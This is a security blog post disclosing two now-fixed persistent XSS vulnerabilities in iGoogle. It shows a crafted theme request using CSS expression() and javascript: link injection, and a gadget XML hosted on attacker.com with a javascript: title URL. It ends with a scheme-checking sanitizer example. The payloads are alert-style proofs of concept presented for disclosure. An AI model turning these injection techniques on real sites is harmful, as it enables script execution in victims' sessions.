Kos Security
A blog about security.

Hacking Google – Part 2

Vulnerability: Cross Site Scripting

Affects: Any browser that allows JavaScript to be executed from CSS. IE6, IE7, and the latest version of Opera were tested.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via CSS injection on a custom theme.

Authentication Status: both unauth and auth

URL used in attack:
http://www.google.com/ig

Payload:
POST /ig/skin_submit_xhr?tmprivacy=1&et=4cdb0f0bQKHcNSc5&referrer=tm HTTP/1.1

{"title":"test","author":"test","description":"","skin":
        [{"background_image":"');}body{background-image:expression(alert(document.domain));
        -o-link:'javascript:alert(document.domain)';-o-link-source:current}/*","logo_color":"white","logo_hex_color":"FFFFFF",
        "background_color":"D1ECF9","gadget_border":"6685b8","gadget_top_background":"6685b8",
        "gadget_top_text":"CEECFC","tab_background":"D1ECF9","tab_border":"93BDD1",
        "tab_text":"3A5787","selected_text":"3A5787","gadget_icon":"00a9ff","icon_color":"00a9ff"}]}

How it’s reflected on the page:

When the iGoogle page loads, the payload fires immediately if the theme (which is attached to a tab) belongs to the currently selected tab.
If that tab is not selected, the payload fires as soon as the user selects it.

GET /ig/skin_xml_to_css?hl=en&gl=us&v2=1&url=http://www.google.com/ig/tm%3Foutput%3Dxml%26te%3DFYvZBahVsoU&skindx=ix:0&fp=lUTDcevwYRs HTTP/1.1

....');}body{background-image:expression(alert(document.domain));-o-link:'javascript:alert(document.domain)';
-o-link-source:current}@import 'data:,*{x:expression(alert(document.domain))}';/*') no-repeat top center;}/* google logo */....

The Danger

A user can share a tab with other users via invitation. If the victim accepts the tab invitation, then the theme with the attached malicious CSS will be added to their page.

Resolution

This issue was resolved in about a week.

Hacking Google – Part 1

Vulnerability: Cross Site Scripting

Affects: all browsers.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via untrusted gadgets hosted on offsite domains.

Authentication Status: both unauth and auth

URL used in attack:
http://www.google.com/ig/adde?moduleurl=attacker.com/payload.xml&source=lpep&mkhp=0

attacker.com/payload.xml:
<ModulePrefs author="Kyle" author_email=""
        description="__MSG_description__" thumbnail="http://www.google.com/images/firefox/sprite2.png"
        screenshot="http://www.google.com/images/firefox/sprite2.png"
        title_url="javascript:alert(document.domain);"  title="[TITLE OF GADGET]" height="165">
        <Require feature="setprefs" />
        <Require feature="views" />
        <Require feature="dynamic-height" />
....
</ModulePrefs>

How it’s reflected on the page:

....
<a id="m_8_url" href="javascript:alert(document.domain);" target="_blank"><span id="m_8_title">[TITLE OF GADGET]</span></a>
....
(The "Hax" string shown below is the title of the gadget, i.e. the link text of the reflected anchor above.)

Resolution

This issue was resolved very quickly.
Google now replaces any URL whose scheme is not http or https with the directory path the gadget file is hosted at.
If the file is hosted at http://attacker.com/path/to/file.xml, the URL becomes http://attacker.com/path/to/
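The scheme check described above, written out as an added JavaScript example (this is not Google's code; `sanitizeTitleUrl` and `moduleDirectory` are assumed names, and the module URL is the one from the example in the text):

```javascript
// Added example, not iGoogle's own code: a gadget's title_url is only kept when
// its scheme is http or https; anything else (javascript:, data:, vbscript:,
// scheme-relative or relative references) is replaced with the directory the
// gadget XML was fetched from, which is the behaviour the post describes.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Directory part of the module URL:
// http://attacker.com/path/to/file.xml -> http://attacker.com/path/to/
function moduleDirectory(moduleUrl) {
  const u = new URL(moduleUrl);
  const dir = u.pathname.slice(0, u.pathname.lastIndexOf("/") + 1);
  return `${u.protocol}//${u.host}${dir}`;
}

function sanitizeTitleUrl(titleUrl, moduleUrl) {
  let parsed;
  try {
    // WHATWG URL parsing strips leading/trailing control characters and
    // spaces and lowercases the scheme, so " JaVaScRiPt:alert(1)" is still
    // recognised as a javascript: URL rather than slipping past a naive
    // startsWith("http") string check.
    parsed = new URL(titleUrl);
  } catch (e) {
    // Relative or otherwise unparseable reference: no absolute http(s)
    // scheme to verify, so fall back to the hosting directory.
    return moduleDirectory(moduleUrl);
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return moduleDirectory(moduleUrl);
  }
  return parsed.href;
}

// Demonstration with the gadget from the post (title_url was javascript:).
const MODULE_URL = "http://attacker.com/path/to/file.xml";
console.log(sanitizeTitleUrl("javascript:alert(document.domain);", MODULE_URL));
// -> http://attacker.com/path/to/
```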